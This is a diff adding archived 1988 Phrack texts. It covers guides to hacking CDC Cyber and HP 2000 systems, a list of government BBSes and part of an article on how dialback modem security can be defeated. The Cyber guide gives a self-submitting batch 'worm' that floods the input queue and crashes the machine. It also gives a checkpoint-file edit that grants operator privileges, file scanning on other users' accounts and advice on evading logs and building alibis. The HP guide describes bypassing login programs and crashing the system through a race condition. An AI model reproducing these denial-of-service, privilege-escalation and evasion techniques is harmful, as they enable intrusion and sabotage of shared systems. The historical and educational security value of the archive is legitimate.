Of course, you're set up to drop this to tape or disk at your leisure, right?
|
||||
|
||||
This works because the people at CDC never thought that a Fortran compile
|
||||
could be interrupted, because they always thought it would be running off
|
||||
cards. So they left the System local to the job until the compile was done.
|
||||
Interrupt the compile, it stays local.
|
||||
|
||||
Warning: When you do ANYTHING a copy of your current batch process shows up
|
||||
on the operator console. Typically the operators are reading Penthouse and
|
||||
don't care, and anyway the display flickers by so fast it's hard to see. But
|
||||
if you copy the whole system, it takes awhile, and they get a blow-by-blow
|
||||
description of what's being copied. ("Hey, why is this %^&$^ on terminal 29
|
||||
copying the PPU code?") I got nailed once this way; I played dumb and they let
|
||||
me go. ("I thought it was a data file from my program").
|
||||
|
||||
|
||||
Staying "Rolled In"
|
||||
|
||||
When the people at CDC designed the job scheduler, they made several "queues."
|
||||
"Queues" are lines.
|
||||
|
||||
There's:
|
||||
|
||||
1. Input Queue. Your job hasn't even gotten in yet. It is standing outside,
|
||||
on disk, waiting.
|
||||
2. Executing Queue. Your job is currently memory resident and is being
|
||||
executed, although other jobs currently in memory are
|
||||
competing for the machine as well. At least you're in
|
||||
memory.
|
||||
3. Timed/Event Rollout Queue: Your job is waiting for something, usually a
|
||||
magtape. Can also be waiting for a given time. Yes, this
|
||||
means you can put a delayed effect job into the system. Ha,
|
||||
ha. You are on disk at this point.
|
||||
4. Rollout Queue: Your job is waiting its turn to execute. You're out on
|
||||
disk right now doing nothing.
|
||||
|
||||
Anyway, let's say you've got a big Pascal compile. First, ALWAYS RUN FROM
|
||||
TELEX (means, off a CRT). Never use cards. If you use cards you're
|
||||
automatically going to be low man on the priority schedule, because the CPU
|
||||
doesn't *have* to get back to you soon. Who of us has time to waste?
|
||||
|
||||
Okay, do the compile. Then do a STATUS on your job from another machine.
|
||||
Typically you'll be left inside the CPU (EXECUTE) for 10 seconds, where you'll
|
||||
share the actual CPU with about 10-16 other jobs. Then you'll be rolled-out
|
||||
(ROLLOUT), at which time you're phucked; you have to wait for your priority to
|
||||
climb back up before it'll execute some more of your job. This can take
|
||||
several minutes on a deeply loaded system.
|
||||
|
||||
(All jobs have a given priority level, which usually increments every 10 sec
|
||||
or so, until they start executing).
|
||||
|
||||
Okay, do this. Press BREAK, then at the "Continue?" prompt, say yes. What
|
||||
happened? Telex had to "roll your job in" to process the BREAK! So you get
|
||||
another free 10 seconds of CPU -- which can get a lot done.
|
||||
|
||||
If you sit and hit BREAK - Y <return> every 10 sec or so during a really big
|
||||
job, you will just fly through it. Of course, everyone else will be sitting
|
||||
and staring at their screen, doing nothing, because you've got the computer.
|
||||
|
||||
If you're at a school with a Cyber, this is how to get your homework done at
|
||||
high speed.
|
||||
|
||||
|
||||
Macro Library
|
||||
|
||||
If you have a typical CDC site, they won't give you access to the "Macro
|
||||
library." This is a set of CPU calls to do various things -- open files, do
|
||||
directory commands, and whatnot. They will be too terrified of "some hacker."
|
||||
Reality: The dimbulbs in power don't want to give up ANY of their power to
|
||||
ANYONE. You can't really do that much more with the Macro library, which
|
||||
gives assembly language access to the computer, than you can with batch
|
||||
commands.. except what you do leaves lots less tracks. They REALLY have to
|
||||
dig to find out what your program did if you use Macro calls.. they have to
|
||||
go to PPU port logs, which is needle in a haystack sort of stuff, vs. batch
|
||||
file logs, which are real obvious.
|
||||
|
||||
Worry not. Find someone at Arizona State or Minnesota U. that's cool, and get
|
||||
them to send you a tape of the libraries. You'll get all the code you can
|
||||
stand to look at. By the way they have a great poster tape... just copy the
|
||||
posters to the line printer. Takes a long time to print them but it's worth
|
||||
it. (They have all the classic ones.. man on the moon, various playmates,
|
||||
Spock, etc. Some are 7 frames wide!).
|
||||
|
||||
With the Macro library, you can do many cool things.
|
||||
|
||||
The best is a demon scanner. All CDC user numbers have controlled access for
|
||||
other users to individual files -- either private, (no access to anyone else),
|
||||
semiprivate (others can read it but a record is made), or public (anyone can
|
||||
diddle your files, no record). What you want is a program (fairly easy to do
|
||||
in Fortran) that counts through user numbers, doing directory commands. If it
|
||||
finds anything, it checks for non semi-private (so no records are made), then
|
||||
copies it to you.
|
||||
|
||||
You'll find the damnedest stuff, I guarantee it. Try to watch some system
|
||||
type signing in and get the digits of his user number, then scan variations
|
||||
beginning with that user #. For instance, if he's a SYS1234, then scan all
|
||||
user #'s beginning with SYS (sysaaaa to sys9999).
|
||||
|
||||
Since it's all inside the Fortran program, the only record, other than
|
||||
hard-to-examine PPU logs, is a "Run Fortran Program" ("LGO.") on the batch
|
||||
dayfile. If you're not giving the overworked system people reason to suspect
|
||||
that commonplace, every-day student Fortran compile is anything out of the
|
||||
ordinary, they will never bother to check -- the amount of data in PPU logs is
|
||||
OVERWHELMING.
|
||||
|
||||
But you can get great stuff.
|
||||
|
||||
There's a whole cool library of Fortran-callable routines to do damned near
|
||||
anything a batch command could do in the Minnesota library. Time to get some
|
||||
Minnesota friends -- like on UseNet. They're real cooperative about sending
|
||||
out tapes, etc.
|
||||
|
||||
Generally you'll find old files that some System Type made public one day (so
|
||||
a buddy could copy them) then forgot about. I picked off all sorts of stuff
|
||||
like this. What's great is I just claimed my Fortran programs were hanging
|
||||
into infinite loops -- this explained the multi-second CPU execution times.
|
||||
Since there wasn't any readily available record of what I was up to, they
|
||||
believed it. Besides, how many idiot users really DO hang into loops? Lots.
|
||||
Hide in numbers. I got Chess 4.2 this way -- a championship Chess program --
|
||||
and lots of other stuff. The whole games library, for instance, which was
|
||||
blocked from access to mere users but not to sysfolk.
|
||||
|
||||
Again, they *can* track this down if you make yourself obnoxious (it's going
|
||||
to be pretty obvious what you're doing if there's a CAT: SYSAAAA
|
||||
CAT: SYSAAAB CAT: SYSAAAC .. etc. on your PPU port log) so do this on someone
|
||||
else's user number.
|
||||
|
||||
|
||||
RJE Status Checks
|
||||
|
||||
Lots of stupid CDC installations.. well, that doesn't narrow the field much..
|
||||
have Remote Job Entry stations. Generally at universities they let some poor
|
||||
student run these at low pay.
|
||||
|
||||
What's funny is these RJE's can do a status on the jobs in the system, and the
|
||||
system screeches to a halt while the status is performed. It gets top
|
||||
priority.
|
||||
|
||||
So, if you want to incite a little rebellion, just sit at your RJE and do
|
||||
status requests over and over. The system will be even slower than usual.
|
||||
|
||||
|
||||
The Worm
|
||||
|
||||
Warning: This is pretty drastic. It goes past mere self-defense in getting
|
||||
enough priority to get your homework done, or a little harmless exploration
|
||||
inside your system, to trying to drop the whole shebang.
|
||||
|
||||
It works, too.
|
||||
|
||||
|
||||
You can submit batch jobs to the system, just as if you'd run them through the
|
||||
punchcard reader, using the SUBMIT command. You set up a data file, then do
|
||||
SUBMIT datafile. It runs separate from you.
|
||||
|
||||
Now, let's say we set up a datafile named WORM. It's a batch file. It looks
|
||||
like this:
|
||||
|
||||
JOB
|
||||
USER,blah (whatever -- a user number you want crucified)
|
||||
GET,WORM; get a copy of WORM
|
||||
SUBMIT,WORM.; send it to system
|
||||
SUBMIT,WORM.; send it to system
|
||||
SUBMIT,WORM.; send it to system
|
||||
SUBMIT,WORM.; send it to system
|
||||
SUBMIT,WORM.; send it to system
|
||||
SUBMIT,WORM.; send it to system
|
||||
SUBMIT,WORM.; send it to system
|
||||
SUBMIT,WORM.; send it to system
|
||||
SUBMIT,WORM.; send it to system
|
||||
SUBMIT,WORM.; send it to system
|
||||
SUBMIT,WORM.; send it to system
|
||||
SUBMIT,WORM.; send it to system
|
||||
SUBMIT,WORM.; send it to system
|
||||
SUBMIT,WORM.; send it to system
|
||||
SUBMIT,WORM.; send it to system
|
||||
SUBMIT,WORM.; send it to system
|
||||
(16 times)
|
||||
(end of file)
|
||||
|
||||
Now, you SUBMIT WORM. What happens? Worm makes 16 copies of itself and
|
||||
submits those. Those in turn make 16 copies of themselves (now we're up to
|
||||
256) and submit those. Next pass is 4096. Then 65536. Then...
|
||||
|
||||
Now, if you're really good, you'll put on your "job card" a request for high
|
||||
priority. How? Tell the system you need very little memory and very little
|
||||
CPU time (which is true, Submit takes almost nothing at all). The scheduler
|
||||
"squeezes" in little jobs between all the big ones everyone loves to run, and
|
||||
gives ultra-priority to really tiny jobs.
|
||||
|
||||
What happens is the system submits itself to death. Sooner or later the input
|
||||
queue overflows .. there's only so much space .. and the system falls apart.
|
||||
|
||||
This is a particularly gruesome thing to do to a system, because if the guy
|
||||
at the console (count on it) tries the usual startup, there will still be
|
||||
copies of WORM in the input queue. First one of those gets loose, the system
|
||||
drops again. With any luck the system will go up and down for several hours
|
||||
before someone with several connected brain cells arrives at the operator
|
||||
console and coldstarts the system.
|
||||
|
||||
If you've got a whole room full of computer twits, all with their hair tied
|
||||
behind them with a rubber band into a ponytail, busily running their Pascal
|
||||
and "C" compiles, you're in for a good time. One second they will all be
|
||||
printing -- the printers will be going weep-weep across the paper. Next
|
||||
second, after you run, they will stop. And they will stay stopped. If you've
|
||||
done it right they can't get even get a status. Ha, ha.
|
||||
|
||||
The faster the CPU, the faster it will run itself into the ground.
|
||||
|
||||
CDC claims there is a limit on the number of jobs a user number can have in
|
||||
the system. As usual they blew it and this limit doesn't exist. Anyway, it's
|
||||
the input queue overflow that kills things, and you can get to the input queue
|
||||
without the # of jobs validation check.
|
||||
|
||||
Bear in mind that *anything* in that batch file is going to get repeated ten
|
||||
zillion times at the operator console as the little jobs fly by by the
|
||||
thousands. So be sure to include some charming messages, like:
|
||||
|
||||
job,blah
|
||||
user,blah
|
||||
* eat me!
|
||||
get,worm
|
||||
submit,worm .. etc.
|
||||
|
||||
There will now be thousands of little "eat me!"'s scrolling across the console
|
||||
as fast as the console PPU can print them.
|
||||
|
||||
Generally at this point the operator will have his blood pressure really
|
||||
spraying out his ears.
|
||||
|
||||
Rest assured they will move heaven and earth to find you. This includes past
|
||||
dayfiles, user logs, etc. So be clean. Remember, "Revenge is a dish best
|
||||
served cold." If you're mad at them, and they know it, wait a year or so,
|
||||
until they are scratching their heads, wondering who hates them this much.
|
||||
|
||||
Also: make sure you don't take down a really important job someone else is
|
||||
doing, okay? Like, no medical databases, and so forth.
|
||||
|
||||
Now, for a really deft touch, submit a timed/event job. This "blocks" the job
|
||||
for awhile, until a given time is reached. Then, when you're far, far away,
|
||||
with a great alibi, the job restarts, the system falls apart, and you're
|
||||
clear. If you do the timed/event rollout with a Fortran program macro call,
|
||||
it won't even show up on the log.
|
||||
|
||||
(Remember that the System Folk will eventually realize, in their little minds,
|
||||
what you've done. It may take them a year or two though).
|
||||
|
||||
|
||||
CHECKPOINT / RESTART
|
||||
|
||||
I've saved the best for last.
|
||||
|
||||
CDC's programmers supplied two utilities, called CheckPoint and Restart,
|
||||
primarily because their computers kept crashing before they would finish
|
||||
anything. What Checkpoint does is make a COMPLETE copy of what you're doing -
|
||||
all local files, all of memory, etc. -- into a file, usually on a magtape.
|
||||
Then Restart "restarts" from that point.
|
||||
|
||||
So, when you're running a 12 hour computer job, you sprinkle checkpoints
|
||||
throughout, and if the CDC drops, you can restart from your last CKP. It's
|
||||
like a tape backup of a hard disk. This way, you only lose the work done on
|
||||
your data between the last checkpoint and now, rather than the whole 12 hours.
|
||||
Look, this is real important on jobs that take days -- check out your local
|
||||
IRS for details..
|
||||
|
||||
Now what's damned funny is if you look closely at the file Checkpoint
|
||||
generates, you will find a copy of your user validations, which tell
|
||||
everything about you to the system, along with the user files, memory, etc.
|
||||
You'll have to do a little digging in hex to find the numbers, but they'll
|
||||
match up nicely with the display you of your user validations from that batch
|
||||
command.
|
||||
|
||||
Now, let's say you CKP,that makes the CKP file. Then run a little FORTRAN
|
||||
program to edit the validations that are inside that CKP-generated file. Then
|
||||
you RESTART from it. Congratulations. You're a self made man. You can do
|
||||
whatever you want to do - set your priority level to top, grab the line
|
||||
printer as your personal printer, kick other jobs off the system (it's more
|
||||
subtle to set their priority to zilch so they never execute), etc. etc.
|
||||
You're the operator.
|
||||
|
||||
This is really the time to be a CDC whiz and know all sorts of dark, devious
|
||||
things to do. I'd have a list of user numbers handy that have files you'd
|
||||
like made public access, so you can go in and superzap them (then peruse them
|
||||
later from other signons), and so forth.
|
||||
|
||||
There's some gotchas in here.. for instance, CKP must be run as part of a
|
||||
batch file out of Telex. But you can work around them now that you know the
|
||||
people at CDC made RESTART alter your user validations.
|
||||
|
||||
It makes sense in a way. If you're trying to restart a job you need the same
|
||||
priority, memory, and access you had when trying to run it before.
|
||||
|
||||
Conclusion
|
||||
|
||||
|
||||
There you have it, the secrets of hacking the Cyber.
|
||||
|
||||
They've come out of several years at a college with one CDC machine, which I
|
||||
will identify as being somewhere East. They worked when I left; while CDC may
|
||||
have patched some of them, I doubt it. They're not real fast on updates to
|
||||
their operating system.
|
||||
|
||||
|
||||
** Grey Sorcerer
|
94
phrack17/6.txt
Normal file
94
phrack17/6.txt
Normal file
|
@ -0,0 +1,94 @@
|
|||
% = % = % = % = % = % = % = %
|
||||
= =
|
||||
% P h r a c k X V I I %
|
||||
= =
|
||||
% = % = % = % = % = % = % = %
|
||||
|
||||
Phrack Seventeen
|
||||
07 April 1988
|
||||
|
||||
File 6 of 12 : How to Hack HP2000's
|
||||
|
||||
|
||||
|
||||
How to Hack an HP 2000
|
||||
|
||||
By: ** Grey Sorcerer
|
||||
|
||||
Okay, so you've read the HP-2000 basic guides, and know your way around. I
|
||||
will not repeat all that.
|
||||
|
||||
There's two or three things I've found that allow you through HP 2000
|
||||
security.
|
||||
|
||||
1. When you log in, a file called HELLO on the user number Z999 is run. A lot
|
||||
of time this file is used to deny you access. Want in? Well, it's just a
|
||||
BASIC program, and an be BREAKed.. but, usually the first thing they do in
|
||||
that program is turn Breaks (interrupts) off by the BRK(0) function. However,
|
||||
if you log in like this:
|
||||
|
||||
HELLO-D345,PASS (return) (break)
|
||||
|
||||
With the break nearly instantly after the return, a lot of time, you'll abort
|
||||
the HELLO program, and be home free.
|
||||
|
||||
2. If you can create a "bad file", which takes some doing, then anytime you
|
||||
try to CSAVE this file (compile and save), the system will quickly fade into a
|
||||
hard crash.
|
||||
|
||||
3. How to make a bad file and other goodies:
|
||||
|
||||
The most deadly hole in security in the HP2000 is the "two terminal" method.
|
||||
You've got to understand buffers to see how it works. When you OPEN a file,
|
||||
or ASSIGN it (same thing), you get 256 bytes of the file -- the first 256.
|
||||
When you need anymore, you get 256 more. They are brought in off the disk in
|
||||
discrete chunks. They are stored in "buffers."
|
||||
|
||||
So. Save a bunch of junk to disk -- programs, data, whatever. Then once your
|
||||
user number is full, delete all of it. The effect is to leave the raw jumbled
|
||||
data on disk.
|
||||
|
||||
|
||||
Pick a time when the system is REAL busy, then:
|
||||
|
||||
1. Have terminal #1 running a program that looks for a file to exist (with the
|
||||
ASSIGN) statement as quickly as it can loop. If it finds the file there, it
|
||||
goes to the very end of the file, and starts reading backwards, record by
|
||||
record, looking for data. If it finds data, it lets you know, and stops at an
|
||||
input prompt. It is now running.
|
||||
|
||||
2. Have terminal #2 create a really huge data file (OPEN-FILE, 3000) or
|
||||
however it goes.
|
||||
|
||||
What happens is terminal #2's command starts zeroing all the sectors of the
|
||||
file, starting at file start. But it only gets so far before someone else
|
||||
needs the processor, and kicks #2 out. The zeroing stops for a sec. Terminal
|
||||
#1 gets in, finds the file there, and reads to the end. What's there? Old
|
||||
trash on disk. (Which can be mighty damned interesting by the way -- did you
|
||||
know HP uses a discrete mark to indicate end-of-buffer? You've just maybe got
|
||||
yourself a buffer that is as deep as system memory, and if you're clever, you
|
||||
can peek or poke anywhere in memory. If so, keep it, it is pure gold).
|
||||
|
||||
But. Back to the action.
|
||||
|
||||
3. Terminal #2 completes the OPEN. He now deletes the file. This leaves
|
||||
Terminal #1 with a buffer full of data waiting to be dumped back to disk at
|
||||
that file's old disk location.
|
||||
|
||||
4. Terminal #2 now saves a load of program files, as many as are required to
|
||||
fill up the area that was taken up by the deleted big file.
|
||||
|
||||
5. You let Terminal #1 past the input prompt, and it writes its buffer to
|
||||
disk. This promptly overlays some program just stored there. Result: "bad
|
||||
program." HPs are designed with a syntax checker and store programs in token;
|
||||
a "bad program" is one that the tokens are screwed up in. Since HP assumes
|
||||
that if a program is THERE, it passed the syntax check, it must be okay...
|
||||
it's in for big problems. For a quick thrill, just CSAVE it.. system tries
|
||||
to semi-compile bad code, and drops.
|
||||
|
||||
Really, the classier thing to do with this is to use the "bottomless buffer"
|
||||
to look through your system and change what you don't like.. maybe the
|
||||
password to A000? Write some HP code, look around memory, have a good time.
|
||||
It can be done.
|
||||
|
||||
** Grey Sorcerer
|
210
phrack17/7.txt
Normal file
210
phrack17/7.txt
Normal file
|
@ -0,0 +1,210 @@
|
|||
% = % = % = % = % = % = % = %
|
||||
= =
|
||||
% P h r a c k X V I I %
|
||||
= =
|
||||
% = % = % = % = % = % = % = %
|
||||
|
||||
Phrack Seventeen
|
||||
07 April 1988
|
||||
|
||||
File 7 of 12 : Accessing Government Computers
|
||||
|
||||
|
||||
+++++++++++++++++++++++++++++++++++++++
|
||||
+ ACCESSING GOVERNMENT COMPUTERS +
|
||||
+ (LEGALLY!) +
|
||||
+-------------------------------------+
|
||||
+ Written by The Sorceress +
|
||||
+ (The Far Side 415/471-1138) +
|
||||
+++++++++++++++++++++++++++++++++++++++
|
||||
|
||||
|
||||
Comment: I came across this article in Computer Shopper (Sept. 1987) and it
|
||||
talked about citizens access government computers since we do pay for them
|
||||
with our taxpayers monies. Since then, I have had friends and gone on a
|
||||
few myself and the databases are full of information for accessing. One
|
||||
thing, you usually have to call the sysop for access and give him your real
|
||||
name, address and the like. They call you back and verify your existence.
|
||||
Just a word of warning; crashing a BBS is a crime, so I wouldn't fool with
|
||||
these since they are government based.
|
||||
|
||||
-----------------------------------------------------------------------------
|
||||
National Bureau of Standards -
|
||||
Microcomputers Electronic Information Exchange.
|
||||
|
||||
Sysops: Ted Landberg & Lisa Carnahan
|
||||
Voice: 301-975-3359
|
||||
Data: 301-948-5717 300/1200/2400
|
||||
|
||||
This BBS is operated by the Institute for Computer Sciences and Technology
|
||||
which is one of four technical organizations within the National Bureau of
|
||||
Standards. This board also contains information on the acquisition,
|
||||
management, security, and use of micro computers.
|
||||
-----------------------------------------------------------------------------
|
||||
Census Bureau -
|
||||
Census Microcomputer and Office Technology Center, Room 1065 FB-3 Washington,
|
||||
D.C. (Suitland, MD)
|
||||
|
||||
Sysop: Nevins Frankel
|
||||
Voice: 301-763-4494
|
||||
Data: 301-763-4576 300/1200
|
||||
|
||||
The purpose of this BBS is to allow users to access the following: Census
|
||||
Microcomputer and office technology information center bulletins and
|
||||
catalogues, software and hardware evaluations, Hardware and software
|
||||
inventories, Census computer club library, Public Domain software, etc.
|
||||
-----------------------------------------------------------------------------
|
||||
Census Bureau -
|
||||
Census Microcomputer and Office Technology Center, Personnel Division,
|
||||
Washington DC.
|
||||
|
||||
Voice: 301-763-4494
|
||||
Data: 301-763-4574 300/1200/2400
|
||||
|
||||
The purpose of this board is to display Census Bureau vacancies from entry
|
||||
level to senior management.
|
||||
-----------------------------------------------------------------------------
|
||||
Department of Commerce -
|
||||
|
||||
Office of the Under Secretary for Economic Affairs, Office of Business
|
||||
Analysis, Economic Bulletin Board.
|
||||
|
||||
Sysop: Ken Rogers
|
||||
Voice: 202-377-0433
|
||||
Data: 202-377-3870 300/1200
|
||||
|
||||
This is another well run BBS with in-depth news about the Department of
|
||||
Commerce Economic Affairs Agencies including current press releases and
|
||||
report summaries.
|
||||
-----------------------------------------------------------------------------
|
||||
COE BBS -
|
||||
Manpower and Force Management Division, Headquarters, U.S. Army Corps of
|
||||
Engineers, 20 Massachusetts Ave. NW, Washington, DC.
|
||||
|
||||
Sysop: Rich Courney
|
||||
Voice: 202-272-1646
|
||||
Data: 202-272-1514 300/1200/2400
|
||||
|
||||
The files database was one of the largest they ever seen. Directory 70 has
|
||||
programs for designing masonry and retaining walls using Lotus's Symphony.
|
||||
|
||||
-----------------------------------------------------------------------------
|
||||
General Services Administration -
|
||||
Information Resources Service Center.
|
||||
|
||||
Data: 202-535-8054 300 bps
|
||||
Data: 202-535-7661 1200 bps
|
||||
|
||||
GSA's Information Resources Service Center provides information on contracts,
|
||||
schedules, policies, and programs. One of the areas that is interesting was
|
||||
the weekly supplement to the consolidated list of debarred, suspended and
|
||||
ineligible contractors.
|
||||
-----------------------------------------------------------------------------
|
||||
Budget and Finance Board of the Office of Immigration Naturalization Service.
|
||||
|
||||
DO NOT CALL THIS BBS DURING WORKING HOURS.
|
||||
|
||||
Sysop: Mike Arnold
|
||||
Data: 202-787-3460 300/1200/2400
|
||||
|
||||
The system is devoted to the exchange of information related to budget and
|
||||
financial management in the federal government. It is a 'working' system
|
||||
for the Immigration and Naturalization Service personnel.
|
||||
-----------------------------------------------------------------------------
|
||||
Naval Aviation News Computer Information (NANei) -
|
||||
Supported by: Naval Aviation News Magazine, Bldg. 159E, Navy Yard Annex,
|
||||
Washington, DC 20374.
|
||||
|
||||
Sysop: Commander Howard Wheeler
|
||||
Voice: 202-475-4407
|
||||
Data: 202-475-1973 300/1200
|
||||
|
||||
Available from 5 pm to 8 am. weekdays 5pm Friday to 8 am Monday
|
||||
|
||||
This is a large BBS with lots of Navy related information and programs. NANci
|
||||
is for those interested in stories, facts, and historical information
|
||||
related to Naval Aviation.
|
||||
-----------------------------------------------------------------------------
|
||||
Federal National Mortgage Association -
|
||||
|
||||
Sysop: Ken Goosens
|
||||
Data: 202-537-7475
|
||||
202-537-7945 300/1200
|
||||
|
||||
This BBS is in transition. Ken Gossens will be running a new BBS at
|
||||
703-979-6360. The BBS maybe become a closed board under the new sysop. This
|
||||
BBS has/had one of largest collections of files for downloading.
|
||||
-----------------------------------------------------------------------------
|
||||
The World Bank, Information, Technology and Facilities Department, Office
|
||||
System Division, Washington DC.
|
||||
|
||||
Sysop: Ashok Daswani
|
||||
Voice: 202-473-2237
|
||||
Data: 202-676-0920 300/1200
|
||||
|
||||
Basically a software exchange BBS, but has other information about the use of
|
||||
microcomputers and software supported by World Bank. IBM product
|
||||
announcements also kept up to date.
|
||||
-----------------------------------------------------------------------------
|
||||
National Oceanic Atmospheric Administration (NOAA), National Meteorological
|
||||
Center.
|
||||
|
||||
* You must obtain a password from the SYSOP to log on to this BBS.
|
||||
|
||||
Sysop: Vernon Patterson
|
||||
Voice: 301-763-8071
|
||||
Data: 301-899-0825 300 bps
|
||||
301-899-0830 1200 bps
|
||||
|
||||
This is one of the most useful databases available on-line. With it you can
|
||||
access meteorological data collected form 6000 locations throughout the
|
||||
world. It can also display crude, but useful graphic maps of the US
|
||||
illustration temperatures, precipitation and forecasts.
|
||||
-----------------------------------------------------------------------------
|
||||
National Weather Service, US Dept. of Commerce, East Coast Marine Users BBS
|
||||
|
||||
* You must obtain a p/w from the SYSOP to logon this BBS.
|
||||
|
||||
Sysop: Ross Laporte
|
||||
Voice: 301-899-3296
|
||||
Data: 301-454-8700 300bps
|
||||
|
||||
Use this BBS to obtain info about marine weather and nautical info about
|
||||
coastal waterways including topical storm advisories.
|
||||
-----------------------------------------------------------------------------
|
||||
NARDAC, Navy Regional Data Automation Center, Norfolk, VA. 23511-6497
|
||||
|
||||
Sysop: Jerry Dew
|
||||
Voice: 804-445-4298
|
||||
Data: 804-445-1627 300 & 1200 bps
|
||||
|
||||
A basic Utilitarian system developed to support the informational needs of
|
||||
NARDAC. The Dept. of Defense mag., CHIPS is available in the files section
|
||||
of this BBS. There are also Navy and IBM related articles to read.
|
||||
-----------------------------------------------------------------------------
|
||||
Veterans Administration, Info Technology Bulletin Board.
|
||||
|
||||
Data: 202-376-2184 300/1200 bps
|
||||
|
||||
The content of this BBS ranges from job opening listings to information
|
||||
computer security.
|
||||
-----------------------------------------------------------------------------
|
||||
Dept. of Energy, Office of Civilian Radioactive Waste Management, Infolink.
|
||||
|
||||
Sysop: Bruce Birnbaum
|
||||
Voice: 202-586-9707
|
||||
Data: 202-586-9359 300/1200 bps
|
||||
|
||||
This BBS has press leases, fact sheets, backgrounders, congressional
|
||||
questions, answers, speeches & testimony, from the Office of Civilian
|
||||
Radioactive Waste Management.
|
||||
-----------------------------------------------------------------------------
|
||||
|
||||
I skipped listing a few of the BBSes in this article if the chances were slim
|
||||
to get on or if the BBS got a bad review. Most of the ones listed seemed
|
||||
to have lot of informative files for downloading and viewing pleasure.
|
||||
This article carried a very strong word of warning about tampering/crashing
|
||||
these since they are run by the govt. and a volunteer Sysop. Since you can
|
||||
get on these legally why not use it?
|
||||
|
||||
The Sorceress
|
212
phrack17/8.txt
Normal file
212
phrack17/8.txt
Normal file
|
@ -0,0 +1,212 @@
|
|||
% = % = % = % = % = % = % = %
|
||||
= =
|
||||
% P h r a c k X V I I %
|
||||
= =
|
||||
% = % = % = % = % = % = % = %
|
||||
|
||||
Phrack Seventeen
|
||||
07 April 1988
|
||||
|
||||
File 8 of 12 : Dialback Modem Security
|
||||
|
||||
|
||||
|
||||
In article <906@hoptoad.uucp> gnu@hoptoad.UUCP writes:
|
||||
>Here are the two messages I have archived on the subject...
|
||||
|
||||
>[I believe the definitive article in that discussion was by Lauren Weinstein,
|
||||
>vortex!lauren; perhaps he has a copy.
|
||||
|
||||
What follows is the original article that started the discussion. I
|
||||
do not know whether it qualifies as the "definitive article" as I think I
|
||||
remember Lauren and I both posted further comments.
|
||||
- Dave
|
||||
|
||||
** ARTICLE FOLLOWS **
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
|
||||
An increasingly popular technique for protecting dial-in ports from
|
||||
the ravages of hackers and other more sinister system penetrators is dial back
|
||||
operation wherein a legitimate user initiates a call to the system he desires
|
||||
to connect with, types in his user ID and perhaps a password, disconnects and
|
||||
waits for the system to call him back at a prearranged number. It is assumed
|
||||
that a penetrator will not be able to specify the dial back number (which is
|
||||
carefully protected), and so even if he is able to guess a user-name/password
|
||||
pair he cannot penetrate the system because he cannot do anything meaningful
|
||||
except type in a user-name and password when he is connected to the system. If
|
||||
he has a correct pair it is assumed the worst that could happen is a spurious
|
||||
call to some legitimate user which will do no harm and might even result in a
|
||||
security investigation.
|
||||
|
||||
Many installations depend on dial-back operation of modems for their
|
||||
principle protection against penetration via their dial up ports on the
|
||||
incorrect presumption that there is no way a penetrator could get connected to
|
||||
the modem on the call back call unless he was able to tap directly into the
|
||||
line being called back. Alas, this assumption is not always true -
|
||||
compromises in the design of modems and the telephone network unfortunately
|
||||
make it all too possible for a clever penetrator to get connected to the call
|
||||
back call and fool the modem into thinking that it had in fact dialed the
|
||||
legitimate user.
|
||||
|
||||
The problem areas are as follows:
|
||||
|
||||
Caller control central offices
|
||||
|
||||
Many older telephone central office switches implement caller control
|
||||
in which the release of the connection from a calling telephone to a called
|
||||
telephone is exclusively controlled by the originating telephone. This means
|
||||
that if the penetrator simply failed to hang up a call to a modem on such a
|
||||
central office after he typed the legitimate user's user-name and password,
|
||||
the modem would be unable to hang up the connection.
|
||||
|
||||
Almost all modems would simply go on-hook in this situation and not
|
||||
notice that the connection had not been broken. If the same line was used to
|
||||
dial out on as the call came in on, when the modem went to dial out to call
|
||||
the legitimate user back the it might not notice (there is no standard way of
|
||||
doing so electrically) that the penetrator was still connected on the line.
|
||||
This means that the modem might attempt to dial and then wait for an
|
||||
answerback tone from the far end modem. If the penetrator was kind enough to
|
||||
supply the answerback tone from his modem after he heard the system modem
|
||||
dial, he could make a connection and penetrate the system. Of course some
|
||||
modems incorporate dial tone detectors and ringback detectors and in fact wait
|
||||
for dial tone before dialing, and ringback after dialing but fooling those
|
||||
with a recording of dial tone (or a dial tone generator chip) should pose
|
||||
little problem.
|
||||
|
||||
|
||||
Trying to call out on a ringing line
|
||||
|
||||
Some modems are dumb enough to pick up a ringing line and attempt to
|
||||
make a call out on it. This fact could be used by a system penetrator to
|
||||
break dial back security even on joint control or called party control central
|
||||
offices. A penetrator would merely have to dial in on the dial-out line
|
||||
(which would work even if it was a separate line as long as the penetrator was
|
||||
able to obtain it's number), just as the modem was about to dial out. The
|
||||
same technique of waiting for dialing to complete and then supplying
|
||||
answerback tone could be used - and of course the same technique of supplying
|
||||
dial tone to a modem which waited for it would work here too.
|
||||
|
||||
Calling the dial-out line would work especially well in cases where
|
||||
the software controlling the modem either disabled auto-answer during the
|
||||
period between dial-in and dial-back (and thus allowed the line to ring with
|
||||
no action being taken) or allowed the modem to answer the line (auto-answer
|
||||
enabled) and paid no attention to whether the line was already connected when
|
||||
it tried to dial out on it.
|
||||
|
||||
|
||||
The ring window
|
||||
|
||||
However, even carefully written software can be fooled by the ring
|
||||
window problem. Many central offices actually will connect an incoming call
|
||||
to a line if the line goes off hook just as the call comes in without first
|
||||
having put the 20 hz. ringing voltage on the line to make it ring. The ring
|
||||
voltage in many telephone central offices is supplied asynchronously every 6
|
||||
seconds to every line on which there is an incoming call that has not been
|
||||
answered, so if an incoming call reaches a line just an instant after the end
|
||||
of the ring period and the line clairvoyantly responds by going off hook it
|
||||
may never see any ring voltage.
|
||||
|
||||
This means that a modem that picks up the line to dial out just as our
|
||||
penetrator dials in may not see any ring voltage and may therefore have no way
|
||||
of knowing that it is connected to an incoming call rather than the call
|
||||
originating circuitry of the switch. And even if the switch always rings
|
||||
before connecting an incoming call, most modems have a window just as they are
|
||||
going off hook to originate a call when they will ignore transients (such as
|
||||
ringing voltage) on the assumption that they originate from the going-off-hook
|
||||
process. [The author is aware that some central offices reverse battery (the
|
||||
polarity of the voltage on the line) in the answer condition to distinguish it
|
||||
from the originate condition, but as this is by no means universal few if any
|
||||
modems take advantage of the information supplied]
|
||||
|
||||
|
||||
In Summary
|
||||
|
||||
It is thus impossible to say with any certainty that when a modem goes
|
||||
off hook and tries to dial out on a line which can accept incoming calls it
|
||||
really is connected to the switch and actually making an outgoing call. And
|
||||
because it is relatively easy for a system penetrator to fool the tone
|
||||
detecting circuitry in a modem into believing that it is seeing dial tone,
|
||||
ringback and so forth until he supplies answerback tone and connects and
|
||||
